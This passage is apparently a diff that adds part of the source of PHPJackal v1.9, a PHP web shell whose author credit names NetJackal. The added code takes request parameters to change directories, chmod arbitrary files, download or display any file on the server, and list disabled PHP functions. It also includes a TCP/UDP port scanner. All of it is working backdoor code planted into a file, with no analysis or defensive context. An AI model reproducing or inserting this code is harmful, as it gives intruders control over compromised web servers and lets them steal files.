| $et");
+}
+if(!empty($_REQUEST['workingdiR']))chdir($_REQUEST['workingdiR']);
+$disablefunctions=ini_get('disable_functions');
+$disablefunctions=explode(',',$disablefunctions);
+function checkthisporT($ip,$port,$timeout,$type=0){
+if(!$type){
+$scan=fsockopen($ip,$port,$n,$s,$timeout);
+if($scan){fclose($scan);return 1;}
+}
+elseif(function_exists('socket_set_timeout')){
+$scan=fsockopen("udp://$ip",$port);
+if($scan){
+socket_set_timeout($scan,$timeout);
+fwrite($scan,"\x00");
+$s=time();
+fread($scan,1);
+if((time()-$s)>=$timeout){fclose($scan);return 1;}
+}
+}
+return 0;
+}
+if(!function_exists('is_executable')){
+function is_executable($addr){
+return 0;
+}
+}
+if(!function_exists('file_get_contents')){
+function file_get_contents($addr){
+$a=fopen($addr,'r');
+$tmp=fread($a,filesize($a));
+fclose($a);
+if($a)return $tmp;else return null;
+}
+}
+if(!function_exists('file_put_contents')){
+function file_put_contents($addr,$con){
+$a=fopen($addr,'w');
+if(!$a)return 0;
+$t=fwrite($a,$con);
+fclose($a);
+if($t)return strlen($con);
+return 0;
+}
+}
+function file_add_contentS($addr,$con){
+$a=fopen($addr,'a');
+if(!$a)return 0;
+fwrite($a,$con);
+fclose($a);
+return strlen($con);
+}
+if(!empty($_REQUEST['chmoD']) && !empty($_REQUEST['modE']))chmod($_REQUEST['chmoD'],'0'.$_REQUEST['modE']);
+if(!empty($_REQUEST['downloaD'])){
+ob_clean();
+$dl=$_REQUEST['downloaD'];
+$con=file_get_contents($dl);
+header('Content-type: application/octet-stream');
+header("Content-disposition: attachment; filename=\"$dl\";");
+header('Content-length: '.strlen($con));
+echo $con;
+exit;
+}
+if(!empty($_REQUEST['imagE'])){
+$img=$_REQUEST['imagE'];
+header('Content-type: imagE/gif');
+header("Content-length: ".filesize($img));
+header("Last-Modified: ".date('r',filemtime($img)));
+echo file_get_contents($img);
+exit;
+}
+if(!empty($_REQUEST['exT'])){
+$ex=$_REQUEST['exT'];
+$e=get_extension_funcs($ex);
+echo ''.htmlspecialchars($ex).'Functions: ';foreach($e as $k=>$f){$i=$k+1;echo "$i)$f ";if(in_array($f,$disablefunctions))echo 'DISABLED';echo ' ';}
+echo '';
+exit;
+}
+function showsizE($size){
+if($size>=1073741824)$size=round(($size/1073741824),2).' GB';
+elseif($size>=1048576)$size=round(($size/1048576),2).' MB';
+elseif($size>=1024)$size=round(($size/1024),2).' KB';
+else $size.=' B';
+return $size;
+}
+$windows=(substr((strtoupper(php_uname())),0,3)=='WIN')?1:0;
+$errorbox="Error: ";
+$v='1.9';
+$cwd=getcwd();
+$msgbox="
";
+$intro="Script: ".str_repeat('-=-',25)." Name: PHPJackal Version: $v
Author: ".str_repeat('-=-',25)." Name: NetJackal Country: Iran Website: http://netjackal.by.ru/ Email: nima_501@yahoo.com $et";
+$footer="${msgbox}PHPJackal v$v - Powered By NetJackal$et";
+$hcwd="";
+$t=" |
|
|
|